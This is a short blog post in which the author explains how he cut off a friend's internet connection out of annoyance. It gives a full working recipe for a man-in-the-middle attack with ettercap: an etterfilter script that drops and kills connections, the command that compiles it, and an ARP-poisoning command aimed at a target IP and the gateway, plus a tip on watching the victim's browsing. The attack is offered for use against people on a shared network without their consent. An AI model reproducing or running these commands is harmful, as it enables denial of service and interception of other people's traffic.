Hey there,
a friend annoyed me, because he used almost all of the bandwidth on my internet. So I couldn't watch any YouTube video. I thought I could kill his internet connection with my laptop. In this contribution I want to tell you how I've done. All you need:
a computer running Linux (Kali Linux in my case) with the tool ettercap.
Firstly you have to open a terminal and type 'ettercap --help'. There shall be a help menu. Ettercap is a tool, which is focused on Man-in-the-middle-attacks. We must generate an "etterfilter". Go to your favourite text editor. Enter:
drop();
kill();
After that, save it as "kill" or something like that. Now type 'etterfilter kill -o kill.ef'. Replace 'kill' with your name of the script. Etterfilter will compile your scipt now. Finally we can attack our target!
Type 'ettercap -T -q -p -F kill.ef -M arp:remote /<your target IP>// /<your gateway//'. In older ettercap versions, use the same command but with only 2 slashes on each target (/10.0.0.3/ /10.0.0.138/ for example). Hit enter and enjoy.
Press 'h' to see the help. If you want to know where your victim is surfing, press 'c'.
Have fun and don't be an idiot!
Kommentare
Kommentar veröffentlichen